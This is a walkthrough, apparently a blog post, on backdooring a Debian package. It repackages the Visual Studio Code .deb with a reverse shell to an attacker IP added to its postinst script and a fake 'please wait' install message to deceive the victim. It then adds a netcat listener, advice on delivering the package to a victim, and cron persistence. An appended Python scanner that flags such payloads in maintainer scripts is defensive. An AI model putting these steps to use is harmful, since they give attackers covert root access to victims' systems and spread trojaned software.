LINUX-BACKDOOR

Educational use only. Unauthorized use is illegal, or else you might learn the hard way. Don’t play!
Welcome Folks!
Today, I decided to post a simple walkthrough showing how to inject a backdoor into a Linux Debian package (.deb).
A backdoor is simply a payload/malware that is secretly planted into a computer or piece of software to give unauthorized access.
To get started, we need a Debian package to inject the backdoor into. You can download any Debian package, but I’ll be making use of the Visual Studio Code Debian package. You can grab it here: Visual_Studio.deb.
The first step is to download the package and extract it using the command below.
dpkg -x code_1.108.2-1769004815_amd64.deb code_pack
code_pack is the new directory we extracted to; you can name it anything you like.
Confirm you now have the code_pack directory using “ls”.
Next we need to extract the control and postinst files; these are the files we will be using to embed the backdoor into the package before rebuilding. To do this, we extract the package again, this time with ar, which unpacks the archive members (debian-binary, control.tar.xz and data.tar.xz) into the current directory:
ar -x code_1.108.2-1769004815_amd64.deb
After extracting, you see a file named “control.tar.xz”. Now extract that tar archive using:
tar -xvf control.tar.xz
We now have the postinst and control files we need.
Go to the code_pack directory and create a sub-directory called “DEBIAN”. Copy the postinst and control files we extracted into this DEBIAN directory.
We now have the two files in the DEBIAN directory. Next is to edit the postinst file with any editor of your choice (nano or vim). I will be using vim:
sudo vim postinst
Now add the following two lines to the postinst script: the reverse-shell payload, together with a message telling the victim to wait while the package is installing.
sudo bash -i >& /dev/tcp/192.168.100.13/2020 0>&1
echo "Please wait, this might take sometime to install....."
Replace the IP address and port number with those of your own (attacker) machine.
Save and close the file when you’re done. Then change the permissions of the two files to 755 using chmod:
chmod 755 postinst control
Repack the code_pack back to the deb package with:
sudo dpkg-deb --build code_pack/
This might take some time to repack; afterwards you see the code_pack.deb package.
Next, open a netcat listener on the attacker machine, making sure the IP address and port number match what you injected into the payload, so that it can catch the reverse connection from the victim’s system and give you remote access. The IP address and port number used were 192.168.100.13 and 2020, so:
nc -lvp 2020
After this, we need to transfer the new code_pack.deb we just repacked to the victim machine. You can use any delivery method you want (flash drives, SSH, a Python HTTP server, any…). Just get it transferred to the victim system.
Once transferred, let’s assume you’re the victim and install the package on the victim’s system using:
sudo dpkg -i code_pack.deb
You can see it is stuck while installing with a message saying “please wait, this might take some time to install”. This is just to fool the victim, letting him think it’s taking time to install while the attacker is controlling his system. If we switch back to the attacker machine, we can see we have remote access while the victim still waits for the never-ending installation process.
Finally, once you have remote access to the root account from the attacker machine, you can schedule a cron job to reinstall the package at a given interval, which gives you persistence.
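From the defender’s side, here is an added example (not part of the original post) that parses a .deb the same way this walkthrough does (ar archive, then control.tar.*) and scans its maintainer scripts for the kind of payload shown above before anyone runs dpkg -i. The indicator patterns are my own choice, not an official list.

```python
"""Scan a .deb's maintainer scripts for reverse-shell indicators (added example)."""
import io
import re
import sys
import tarfile

# Patterns that have no business in a legitimate preinst/postinst/prerm/postrm.
INDICATORS = {
    "bash_tcp_redirect": re.compile(r"/dev/(tcp|udp)/\d{1,3}(\.\d{1,3}){3}/\d+"),
    "interactive_shell": re.compile(r"\b(ba)?sh\s+-i\b"),
    "netcat_exec": re.compile(r"\bnc(at)?\b.*\s-e\s"),
    "download_and_run": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
}
MAINT_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")


def scan_script(name, text):
    """Return a list of (script, indicator, line_no, line) for every hit."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for label, pat in INDICATORS.items():
            if pat.search(line):
                hits.append((name, label, no, line.strip()))
    return hits


def scan_control_tar(data):
    """Scan every maintainer script inside a control.tar.* blob (xz, gz or plain)."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar.getmembers():
            base = member.name.split("/")[-1]          # "./postinst" -> "postinst"
            if base in MAINT_SCRIPTS and member.isfile():
                text = tar.extractfile(member).read().decode("utf-8", "replace")
                hits += scan_script(base, text)
    return hits


def scan_deb(path):
    """Walk the ar archive of a .deb, find control.tar.*, and scan it."""
    with open(path, "rb") as f:
        blob = f.read()
    if blob[:8] != b"!<arch>\n":
        raise ValueError("not an ar archive: %s" % path)
    off = 8
    while off + 60 <= len(blob):                       # 60-byte ar member headers
        hdr = blob[off:off + 60]
        name = hdr[:16].decode("ascii", "replace").strip().rstrip("/")
        size = int(hdr[48:58])                         # decimal size field
        if name.startswith("control.tar"):
            return scan_control_tar(blob[off + 60:off + 60 + size])
        off += 60 + size + (size & 1)                  # members are 2-byte aligned
    return []


if __name__ == "__main__":
    for hit in scan_deb(sys.argv[1]):                  # usage: python scan_deb.py pkg.deb
        print("%s:%d [%s] %s" % (hit[0], hit[2], hit[1], hit[3]))
```

Run it against code_pack.deb from this walkthrough and the injected line is reported twice, once per matching indicator; a clean package yields no output.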